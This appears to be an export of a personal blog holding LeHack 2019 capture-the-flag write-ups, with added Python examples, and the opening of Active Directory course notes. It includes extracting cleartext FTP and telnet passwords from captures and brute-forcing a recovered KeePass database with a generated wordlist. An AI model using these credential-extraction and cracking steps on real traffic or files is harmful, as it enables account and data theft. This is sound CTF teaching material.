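<p>Adding a <code>print(flag)</code> runs the whole script, which is fine for a five-point challenge and a bad habit for crackmes of unknown origin. As an added example, not code from the original write-up, the following recovers the flag statically: it parses the script with the <code>ast</code> module, takes the right-hand side of <code>flag = ...</code>, vets it against a small allow-list of node types, names and <code>str</code> methods, and evaluates only that expression with no builtins in scope. <code>CHECKME_SOURCE</code> is the script shown above; the allow-lists are this example's own choice.</p>

```python
"""Recover a crackme's hard-coded flag statically, without running the script.

Added example, not code from the original write-up. Editing the script to
`print(flag)` works, but it executes whatever else the file contains. Here the
source is parsed with `ast`, the `flag = ...` assignment is located, its
right-hand side is checked to contain only string literals, arithmetic,
slicing, `chr`/`ord` and a few `str` methods, and only that expression is
evaluated. `input()` and the rest of the script never run, which is the habit
to keep for untrusted crackmes. CHECKME_SOURCE is the script from the write-up.
"""
import ast

CHECKME_SOURCE = r'''#!/usr/bin/env python3
flag = 'repuS'[::(-1 * 88 + 87 * 0 * 183 + 80 + 0 * 125 + 7)] + chr(0 * 161 + 1 * 0 * 140 + 76 + 0 * 72 + 7) + chr(-26 + 0 * 53 + 0 * 5 * 44 + 26 + 0 * 141 + 101) + chr(0 * 153 + 14 * 0 * 152 + 4 + 1 * 94 + 1) + ('FfdkCtfr'[::-1]).replace('f','e').replace(chr(4 * 26 + 3), chr(0 * 142 + 111)) + 'fzfqfQorTheWinjkildzodzp'[6:14]
pass1 = input(' :essap ed tom ertov rertne zelliuev'[::-1])
if pass1 == flag:
    print('Bien joue, tu as trouve le flag!')
else:
    print ('Loupe... essaye encore!')
'''

# Only these node types, names and methods may appear in the expression we evaluate
# (this allow-list is the example's own choice, sized for string-building crackmes).
ALLOWED_NODES = (ast.BinOp, ast.UnaryOp, ast.Constant, ast.Subscript, ast.Slice,
                 ast.Call, ast.Attribute, ast.Name, ast.Load,
                 ast.Add, ast.Sub, ast.Mult, ast.USub, ast.UAdd)
ALLOWED_NAMES = {"chr", "ord"}
ALLOWED_METHODS = {"replace", "upper", "lower", "swapcase"}


def find_assignment(tree: ast.AST, target: str) -> ast.AST:
    """Return the right-hand side of the first `target = ...` statement."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign):
            if any(isinstance(t, ast.Name) and t.id == target for t in node.targets):
                return node.value
    raise LookupError(f"no assignment to {target!r}")


def check_expression(expr: ast.AST) -> None:
    """Refuse anything that is not a harmless string/arithmetic construct."""
    for node in ast.walk(expr):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"refusing {type(node).__name__} in flag expression")
        if isinstance(node, ast.Name) and node.id not in ALLOWED_NAMES:
            raise ValueError(f"refusing name {node.id!r}")
        if isinstance(node, ast.Attribute) and node.attr not in ALLOWED_METHODS:
            raise ValueError(f"refusing method {node.attr!r}")


def extract_flag(source: str, target: str = "flag") -> str:
    """Parse `source`, vet the `target` expression and evaluate it in isolation."""
    expr = find_assignment(ast.parse(source), target)
    check_expression(expr)
    code = compile(ast.Expression(body=expr), "<flag>", "eval")
    # No builtins at all: only the two vetted names are reachable from the expression.
    return eval(code, {"__builtins__": {}, "chr": chr, "ord": ord})


if __name__ == "__main__":
    print(extract_flag(CHECKME_SOURCE))
```

<p>The allow-list is deliberately small: a crackme whose flag expression needs <code>__import__</code>, <code>open</code> or <code>getattr</code> is not a string puzzle any more, and the right answer is to read it, not to widen the list.</p>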
<p>The flag is printed and we can validate the challenge: <code>SuperSecretCodeForTheWin</code>.</p>LeHack 19 - my first network analysis2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-my-first-network-analysis.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/ftp.pcapng">ftp.pcapng</a></em></p>
<div class="highlight"><pre><span></span><code>my first network analysis
5 Points
find the user's password in the following capture!
Url: https://static.wargame.rocks/ftp.pcapng
</code></pre></div>
<p>The file name already hints at what awaits us. We open the network capture in Wireshark:</p>
<p><img alt="wireshark" src="https://blog.nlegall.fr/images/lehack_ftp.png"></p>
<p>The password appears directly in clear (highlighted line); the display filter <code>ftp.request.command == "PASS"</code> isolates it in larger captures. Our flag is therefore: <code>HuHuFTPnosecure</code>.</p>
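<p>What Wireshark shows in one highlighted line can also be pulled out of a stream dump with a few lines of code. The following is an added example, not code from the original write-up: it walks a "Follow TCP Stream" style transcript of the FTP control channel, pairs every <code>USER</code> with the <code>PASS</code> that follows it and with the server's verdict, and lists the credentials that were accepted. The capture itself is not reproduced on the page, so <code>SAMPLE_STREAM</code> is a constructed transcript with a <code>C:</code>/<code>S:</code> direction prefix per line.</p>

```python
"""Pull cleartext FTP logins out of a captured control-channel stream.

Added example, not code from the original write-up. The capture is not
reproduced on the page, so SAMPLE_STREAM is a constructed transcript in the
shape Wireshark's "Follow TCP Stream" gives, with a C:/S: direction prefix
added per line. The parser pairs each USER with the PASS that follows and
with the server's verdict (2xx accepted, 5xx refused), which is exactly what
anyone sniffing the segment gets for free; the same approach works for any
line-oriented cleartext protocol.
"""
import re

SAMPLE_STREAM = """\
S: 220 (vsFTPd 3.0.3)
C: USER alice
S: 331 Please specify the password.
C: PASS correct-horse-battery
S: 230 Login successful.
C: SYST
S: 215 UNIX Type: L8
C: USER bob
S: 331 Please specify the password.
C: PASS wrong
S: 530 Login incorrect.
C: USER bob
S: 331 Please specify the password.
C: PASS right-this-time
S: 230 Login successful.
C: QUIT
S: 221 Goodbye.
"""

CLIENT_CMD = re.compile(r"^C: (USER|PASS)(?: (.*))?$")
SERVER_REPLY = re.compile(r"^S: (\d{3})")


def extract_logins(stream: str):
    """Return [(user, password, accepted), ...] in the order the attempts occurred."""
    logins = []
    user, password = None, None
    for line in stream.splitlines():
        cmd = CLIENT_CMD.match(line)
        if cmd:
            if cmd.group(1) == "USER":
                user, password = cmd.group(2) or "", None
            else:
                password = cmd.group(2) or ""
            continue
        reply = SERVER_REPLY.match(line)
        if reply and password is not None:
            code = reply.group(1)
            if code[0] in "25":   # 230 logged in, 530 refused; a 3xx would ask for more
                logins.append((user, password, code[0] == "2"))
                password = None
    return logins


def credentials_in_clear(stream: str):
    """Just the (user, password) pairs the server accepted: what a sniffer walks away with."""
    return [(u, p) for u, p, ok in extract_logins(stream) if ok]


if __name__ == "__main__":
    for user, password, ok in extract_logins(SAMPLE_STREAM):
        print(f"{user}:{password}  {'accepted' if ok else 'refused'}")
```

<p>Refused attempts are kept on purpose: a burst of <code>530</code> replies for one account is the brute-force signature a detection rule would look for, while a single <code>230</code> after them is the one that matters.</p>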
<p>This challenge reminds us, as WorldGolfChampion did, that some protocols do not encrypt the exchanges between the server and its client(s). Switching to SFTP or FTPS (FTP over SSL/TLS) is then essential so that a third party intercepting the traffic cannot read this data.</p>LeHack 19 - Tipiak2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-tipiak.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/tipiak.png">tipiak.png</a></em></p>
<div class="highlight"><pre><span></span><code>Tipiak
50 Points
Tipiak
Url: https://static.wargame.rocks/tipiak.png
</code></pre></div>
<p>So we have an image to analyse. It is easy to spot that the visor carries a rather odd grid of pixels.</p>
<p>No script or tool gave a usable result, so the manual method was needed: cut the pixels apart to make them easier to read off, and transcribe red as <code>1</code> and yellow as <code>0</code>. Note that with this mapping the rows come out as the bitwise complement of ASCII: the string decoded further down is these rows with every bit flipped, i.e. red as <code>0</code> and yellow as <code>1</code>.</p>
<p>GIMP helps here by displaying a grid that separates the pixels.</p>
<p><img alt="tipiak" src="https://blog.nlegall.fr/images/lehack_tipiak.png"></p>
<p>This gives the following binary sequence:</p>
<div class="highlight"><pre><span></span><code>100111101001011110010
0001000011011011111100100101001111010001
011100110101000011010000110100001101101111111011
1101101111110010111100110101000110110011010110111
1110001000100111101000101111011111100001101001101
01101111110001000100111101001000110001011110111111
10111101111010110001011110011001001011111011111100
1100110010011110010111001100010000101110111111001
011010000101110001011101111110010011100101111010
00001000110010001111100110101001110010001011100
111101001110010001010100100111001111010001101
1000110110001101100011011000110110001101100
011011000110110001101
</code></pre></div>
<p>Python3 decodes all this (the string below is the complement of the rows above: 560 bits for 70 characters). Sizing the buffer from <code>bit_length()</code> is fine here because the text does not start with a NUL byte; <code>len(bits) // 8</code> avoids the question altogether:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">n</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="s1">'0b01100001011010000110111101111001001000000110110101100001011101000110010101111001011110010111100100100000001000010010000001101000011001010111001001100101001000000111011101100001011101000010000001111001011001010010000001110111011000010110111001110100001000000010000100001010011101000011001101101000001000000110011001101100001101000110011101111010001000000110100101111010001110100010000001101100011010000101111101110011011100000110010101100011011101000110000101100011011101010110110001100001011100100111001001110010011100100111001001110010011100100111001001110010'</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">n</span><span class="o">.</span><span class="n">to_bytes</span><span class="p">((</span><span class="n">n</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">+</span> <span class="mi">7</span><span class="p">)</span> <span class="o">//</span> <span class="mi">8</span><span class="p">,</span> <span class="s1">'big'</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span>
<span class="s1">'ahoy mateyyy ! here wat ye want !</span><span class="se">\n</span><span class="s1">t3h fl4gz iz: lh_spectacularrrrrrrrr'</span>
</code></pre></div>
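<p>Having to guess which colour is <code>1</code> is exactly the kind of thing a script should settle for you. The following is an added example, not code from the original write-up: it takes the transcribed rows, decodes them under both polarities and keeps the one that yields printable text, and includes the nearest-colour classification that turns pixel values into bits (the RGB samples it is tested on are constructed, since the image is not on the page). <code>TIPIAK_ROWS</code> are the rows listed above, red as <code>1</code> and yellow as <code>0</code>.</p>

```python
"""Decode a two-colour pixel grid into text, resolving the 0/1 polarity automatically.

Added example, not code from the original write-up. TIPIAK_ROWS are the rows
transcribed above with red = 1 and yellow = 0. Read that way they are the
bitwise complement of ASCII, so `decode_grid` tries both polarities and keeps
the one that is printable text, instead of relying on having guessed the colour
mapping right. `pixels_to_bits` is the colour-classification step the write-up
did by eye, with a nearest-colour rule that tolerates slightly off shades; its
RGB inputs are constructed, since the image is not reproduced on the page.
"""

TIPIAK_ROWS = [
    "100111101001011110010",
    "0001000011011011111100100101001111010001",
    "011100110101000011010000110100001101101111111011",
    "1101101111110010111100110101000110110011010110111",
    "1110001000100111101000101111011111100001101001101",
    "01101111110001000100111101001000110001011110111111",
    "10111101111010110001011110011001001011111011111100",
    "1100110010011110010111001100010000101110111111001",
    "011010000101110001011101111110010011100101111010",
    "00001000110010001111100110101001110010001011100",
    "111101001110010001010100100111001111010001101",
    "1000110110001101100011011000110110001101100",
    "011011000110110001101",
]

RED, YELLOW = (255, 0, 0), (255, 255, 0)
FLIP = str.maketrans("01", "10")


def pixels_to_bits(pixels, one=RED, zero=YELLOW) -> str:
    """Classify each RGB tuple as '1' or '0' by the nearer reference colour."""
    def dist2(a, b):
        return sum((x - y) ** 2 for x, y in zip(a, b))
    return "".join("1" if dist2(p, one) <= dist2(p, zero) else "0" for p in pixels)


def bits_to_text(bits: str) -> str:
    """MSB-first bit string to text; sized from len(bits) so leading zero bytes survive."""
    if not bits or len(bits) % 8:
        raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
    return int(bits, 2).to_bytes(len(bits) // 8, "big").decode("latin-1")


def printable_score(text: str) -> int:
    """How many characters look like text (printable, newline or tab)."""
    return sum(c.isprintable() or c in "\n\t" for c in text)


def decode_grid(rows):
    """Join the rows, decode under both polarities and return (text, inverted)."""
    bits = "".join(rows)
    if set(bits) - {"0", "1"}:
        raise ValueError("rows must contain only '0' and '1'")
    straight = bits_to_text(bits)
    flipped = bits_to_text(bits.translate(FLIP))
    if printable_score(flipped) > printable_score(straight):
        return flipped, True
    return straight, False


if __name__ == "__main__":
    text, inverted = decode_grid(TIPIAK_ROWS)
    print("polarity inverted" if inverted else "polarity as transcribed")
    print(text)
```

<p>Rows of uneven length are joined before decoding, so the grid may be read off in whatever order the image imposes; the length check then catches a missed or doubled pixel, which is the usual transcription error, before it turns into garbage characters.</p>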
<p>We thus get our flag: <code>lh_spectacularrrrrrrrr</code>.</p>LeHack 19 - WorldGolfChampion2019-07-07T00:00:00+02:002019-07-07T00:00:00+02:00nlegalltag:blog.nlegall.fr,2019-07-07:/lehack-19-worldgolfchampion.html<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/WorldGolfChampion.pcap">WorldGolfChampion.pcap</a></em></p>
<div class="highlight"><pre><span></span><code>WorldGolfChampion
50 Points
Help me, i need this flag
Url: http://static.wargame.rocks/WorldGolfChampion.pcap
</code></pre></div>
<p>We open the capture in Wireshark. To make the whole thing readable, use the Follow TCP Stream option (<code>Ctrl</code> + <code>Alt</code> + <code>Shift</code> + <code>T</code>).</p>
<p>We can then read the telnet traffic, which is in cleartext (telnet has no encryption, so every keystroke, password included, is visible to anyone on the path).</p>
<p>Some interesting pieces of information stand out:</p>
<ul>
<li>username: tiger</li>
<li>password: woods1275</li>
<li>commands used: <code>keepass-cli</code>, <code>kpcli</code>, <code>base64 myecret.kdbx</code></li>
</ul>
<p>The sequence of commands tells the story: the user lost the master password of his KeePass database. To get the file onto his own machine, he base64-encoded it in the terminal so he could reproduce it locally. We can do the same and recover the file:</p>
<div class="highlight"><pre><span></span><code>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
QtUzbXKNYw==
</code></pre></div>
<p>The two equals signs at the end of the string are base64 padding, a strong hint that this really is base64. A second check: once decoded, the file starts with the bytes <code>03 D9 A2 9A 67 FB 4B B5</code>, the signature of a KeePass 2.x (.kdbx) database.</p>
<p>We decode it into a file:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s1">'A9mimmf7S7UBAAMAA[...]QtUzbXKNYw=='</span> <span class="p">|</span> base64 -d > password.kdbx
</code></pre></div>
<p>Now that we have the file, we need the master password to open it. The capture shows attempts with similar passwords: <code>woods1077</code> and <code>woods1282</code>. We can therefore guess that the password is the word <code>woods</code> followed by 4 digits.</p>
<p>Several tools exist for this. One option is https://github.com/asciimoo/exrex, which expands a regular expression into every string it matches:</p>
<div class="highlight"><pre><span></span><code>$ pip install exrex
$ exrex <span class="s1">'woods\d{4}'</span> > wordlist
</code></pre></div>
<p>Now that we have our wordlist, we can try these passwords one by one against the file. Again, tools exist for this; <code>keepass_guesser</code> is one of them:</p>
<div class="highlight"><pre><span></span><code>$ git clone https://github.com/csirac2/keepass_guesser
$ <span class="nb">cd</span> keepass_guesser
$ pip2 install -r requirements.txt
$ python2 keepass_guesser password.kdbx wordlist
SUCCESS after <span class="m">181</span> attempts:
woods0180
</code></pre></div>
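<p>Before handing the file to a guesser, it is worth confirming what was actually recovered and how expensive each guess will be. The Python below is an added example, not part of the original write-up: it parses the unencrypted outer header of the .kdbx from the first four base64 lines of the dump above (no key is needed for that part, and those lines come from the capture, not from us) and rebuilds the same candidate list that <code>exrex 'woods\d{4}'</code> produces. Field names follow the KeePass 2.x header layout; the function and constant names are ours.</p>

```python
import base64
import struct

# First four base64 lines of the dump above (from the capture, not constructed):
# they contain the whole cleartext outer header of the .kdbx file.
KDBX_B64_PREFIX = (
    "A9mimmf7S7UBAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wMEAAEAAAAEIACPn/XAvrGdkHpO/UQPpqE8"
    "tGF9P+acZbgaI1Wg2oYpPgUgAPsP24ga43zdwBDz+mNk6ZhZTH7iyEQ4MGQwhrH6t5zRBggAoIYB"
    "AAAAAAAHEAAmy+ntoeOCv5REZ4ewFaTbCCAAiQHYbLwXg/HKSnyTu58FlStcAL80LX2634i1a7XB"
    "hPIJIAAM7XXSbK2eKWQ88d/evgKTCbCWN/TqWRMj2k+KfLqQ0AoEAAIAAAAABAANCg0KfmOoscak"
)

KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67   # "03 D9 A2 9A 67 FB 4B B5" on disk
CIPHERS = {
    bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"): "AES-256-CBC",
    bytes.fromhex("d6038a2b8b6f4cb5a524339a31dbb59a"): "ChaCha20",
}
FIELD_NAMES = {0: "EndOfHeader", 1: "Comment", 2: "CipherID", 3: "CompressionFlags",
               4: "MasterSeed", 5: "TransformSeed", 6: "TransformRounds",
               7: "EncryptionIV", 8: "ProtectedStreamKey", 9: "StreamStartBytes",
               10: "InnerRandomStreamID", 11: "KdfParameters"}


def parse_kdbx_header(data: bytes) -> dict:
    """Parse the outer header of a KeePass 2.x file.

    KDBX 3.x uses 16-bit field sizes, KDBX 4.x 32-bit ones; each field is
    (id, size, value) and id 0 terminates the header. Returns the version,
    cipher, compression flag, AES-KDF rounds (3.x) and the raw fields.
    """
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KeePass 2.x (.kdbx) file")
    fmt = "<BI" if major >= 4 else "<BH"
    off, fields = 12, {}
    while True:
        fid, size = struct.unpack_from(fmt, data, off)
        off += struct.calcsize(fmt)
        value = data[off:off + size]
        if len(value) != size:
            raise ValueError("truncated header")
        off += size
        fields[FIELD_NAMES.get(fid, "Unknown%d" % fid)] = value
        if fid == 0:
            break
    info = {
        "version": (major, minor),
        "header_len": off,            # where the encrypted payload starts
        "fields": fields,
        "cipher": CIPHERS.get(fields.get("CipherID"), "unknown"),
        "compression": struct.unpack("<I", fields.get("CompressionFlags", b"\0\0\0\0"))[0],
    }
    if "TransformRounds" in fields:    # AES-KDF iteration count: the cost of one guess
        info["transform_rounds"] = struct.unpack("<Q", fields["TransformRounds"])[0]
    if "InnerRandomStreamID" in fields:  # 2 = Salsa20 in KDBX 3.x
        info["inner_stream"] = struct.unpack("<I", fields["InnerRandomStreamID"])[0]
    return info


def header_from_dump(b64: str = KDBX_B64_PREFIX) -> dict:
    """Decode the base64 prefix recovered from the telnet session and parse it."""
    return parse_kdbx_header(base64.b64decode(b64))


def candidates(prefix: str, digits: int) -> list:
    """Same candidate set as `exrex 'woods\\d{4}'`: prefix + every zero-padded number."""
    return [f"{prefix}{n:0{digits}d}" for n in range(10 ** digits)]


if __name__ == "__main__":
    info = header_from_dump()
    print("KDBX %d.%d, %s, %d AES-KDF rounds, compression=%d, payload at offset %d"
          % (*info["version"], info["cipher"], info["transform_rounds"],
             info["compression"], info["header_len"]))
    wl = candidates("woods", 4)
    print(len(wl), "candidates; woods0180 is attempt #%d" % (wl.index("woods0180") + 1))
```

<p>The header says KDBX 3.1, AES-256 with 100,000 AES-KDF rounds: each guess costs 100,000 AES rounds, which is why a 10,000-word list still takes noticeable time and why GPU cracking (hashcat mode 13400, fed with a hash line produced by <code>keepass2john</code>) is normally the tool of choice for anything bigger. The candidate list puts <code>woods0180</code> in position 181, matching the guesser's output above.</p>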
<p>We can now open the KeePass database and display its content. It holds three entries:</p>
<p>Showing the password of the first one gives us the flag: <code>lh_{I1oVeG0lfAndSex..W4IT.MyWiFe}</code>.</p>
<p>PS: <code>hashcat</code> can also brute force KeePass files. However, when trying it on this file, no result came out. Even with the password forced into the dictionary, <code>hashcat</code> found no match for the hash generated from the decoded base64.</p>
<h1>LeHack</h1>
<p><em>2019-07-06, nlegall, <a href="https://blog.nlegall.fr/lehack.html">https://blog.nlegall.fr/lehack.html</a></em></p>
<p><img alt="https://lehack.org/user/images/lehack19/lehack_logo_h.png" src="https://lehack.org/user/images/lehack19/lehack_logo_h.png"></p>
<p><a href="https://lehack.org">https://lehack.org</a></p>
<p>LeHack is an event held every year in Paris. Some may have known it under its former name: <code>La nuit du hack</code>.</p>
<h2>2019 edition</h2>
<p>I went to the 2019 edition with colleagues from the ESD course. Members from Rennes, Nantes and Paris were there :). Two of our trainers also came along.</p>
<p>We finished 21st in the ranking with a total of 515 points. Write-ups are available for the challenges we solved. For the ones we did not solve, they should follow later.</p>
<h3>Challenges</h3>
<ul>
<li><a href="https://blog.nlegall.fr/lehack-19-double-cesar.html">double césar</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-gladiator.html">gladiator</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-ecsc-stegcryptodiy-1.html">#ECSC StegCryptoDIY #1</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-hackhacklehack.html">HackHackLeHack</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-infiltrez-la-mafia.html">Infiltrez la mafia</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-my-first-crackme.html">my first crackme</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-my-first-network-analysis.html">my first network analysis</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-tipiak.html">Tipiak</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-worldgolfchampion.html">World Golf Champion</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-alphajet.html">alphajet</a></li>
<li><a href="https://blog.nlegall.fr/lehack-19-ecsc-amok.html">#ECSC Amok</a></li>
</ul>
<h3>Équipe</h3>
<p>Our team was called <code>ESD ENI Et Sylvie Et Evelyne Et Non</code>. We were all from the ENI ESD course, Rennes - Nantes:</p>
<ul>
<li><a href="https://fr.linkedin.com/in/maxime-caradec-856347157">Maxime Caradec</a></li>
<li><a href="https://viperr.org/site/index.html">Penthium2</a></li>
<li><a href="https://fr.linkedin.com/in/marion-nourrisset">Cuiliere_a_soupe</a></li>
<li><a href="https://fr.linkedin.com/in/mathieu-leforestier">TheForester</a></li>
<li><a href="https://fr.linkedin.com/in/gaelrepillez">DADmin</a></li>
<li><a href="https://fr.linkedin.com/in/acools">Kokoy</a></li>
<li><a href="https://fr.linkedin.com/in/eric-alsabty">K3b4b</a></li>
<li><a href="https://fr.linkedin.com/in/lucas-gicquiaud-751281132">Lucas</a></li>
<li><a href="https://fr.linkedin.com/in/antoine-barrier">Antoine</a></li>
<li><a href="https://fr.linkedin.com/in/yanncara">Glyann</a></li>
<li>Yoan</li>
<li><a href="https://www.minch.info">Francois</a></li>
<li><a href="https://fr.linkedin.com/in/damecour">Jeremy</a></li>
<li><a href="https://www.root-me.org/zancrows">Zancrows (split between 2 teams) Thank you for your hints</a></li>
<li><a href="https://k-lfa.info">K-lfa</a></li>
</ul>
<h1>AD - Advanced</h1>
<p><em>2018-11-24, nlegall, <a href="https://blog.nlegall.fr/ad-avance.html">https://blog.nlegall.fr/ad-avance.html</a></em></p>
<p><img alt="" src="https://img.nlegall.fr/WdEkNxXJ"> Advanced management of Active Directory directory services</p>
<p><em>LDAP: RFC 4511</em></p>
<h1>Structure of the AD directory</h1>
<h2>Definitions</h2>
<table>
<thead>
<tr>
<th>Term</th>
<th>Definition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Forest</td>
<td>A grouping of several AD domains that share a single schema. A logical design, not a physical one.</td>
</tr>
<tr>
<td>Domain</td>
<td>The administrative unit of AD within which certain features and settings are shared. Holds the AD objects.</td>
</tr>
<tr>
<td>Domain controller</td>
<td>A server running an OS on which the AD Domain Services role is deployed and which has been promoted to domain controller. It keeps the AD domain running.</td>
</tr>
<tr>
<td>Site</td>
<td>Directory object stored in the configuration partition (<code>CN=Sites,CN=Configuration,DC=domain,DC=tld</code>). Helps clients locate nearby services and controls replication traffic.</td>
</tr>
<tr>
<td>Forest root domain</td>
<td>The first domain installed in a forest, the one whose creation created the forest.</td>
</tr>
<tr>
<td>Domain tree</td>
<td>All the domains of one branch: a contiguous namespace.</td>
</tr>
<tr>
<td>Trust relationship</td>
<td>Allows users from another domain or forest to access internal resources of the company. Example: joining a workstation to the domain.</td>
</tr>
<tr>
<td>Object</td>
<td>Represents a single logical entity together with all of its attributes.</td>
</tr>
<tr>
<td>Attribute</td>
<td>A characteristic of an object.</td>
</tr>
<tr>
<td>Class</td>
<td>The type of an object: computer, contact, group, OU, printer or user. Includes the set of attributes specific to that class.</td>
</tr>
<tr>
<td>Schema</td>
<td>Defines the object types that can be created and their possible attributes.</td>
</tr>
<tr>
<td>Database</td>
<td>Central location where the data is stored. Represents a set of fields.</td>
</tr>
<tr>
<td>Logical structure</td>
<td>The view presented in the management consoles.</td>
</tr>
<tr>
<td>Partitions</td>
<td>Domain, configuration and schema partitions.</td>
</tr>
<tr>
<td>Physical structure</td>
<td>The hard disk holding the database.</td>
</tr>
</tbody>
</table>
<h2>Active Directory structure</h2>
<p><img alt="" src="https://img.nlegall.fr/k0veic0j"></p>
<p>Enterprise Admins: every domain in the enterprise. The group exists only in the forest root domain.
Domain Admins: only their own domain.</p>
<p>Domain controllers work in multi-master mode: each controller holds a replica of the AD database and can both read from and write to it.</p>
<p>AD depends on network services to operate:</p>
<ul>
<li>DNS: without it the domain cannot work. It is used to communicate with the domain and to locate services through SRV records (LDAP, Kerberos, GC...).</li>
</ul>
<p>The following roles rely on AD: Hyper-V, WDS, DFS, Exchange, SCCM...</p>
<h2>Object</h2>
<p>A directory is a collection of entries, records or objects. All of a directory's content is gathered in these objects.</p>
<p>OBJECT -> CLASS -> ATTRIBUTE -> VALUE</p>
<p>Uniqueness attributes:</p>
<ul>
<li>GUID: uniquely identifies any object. This attribute cannot change during the object's lifetime.</li>
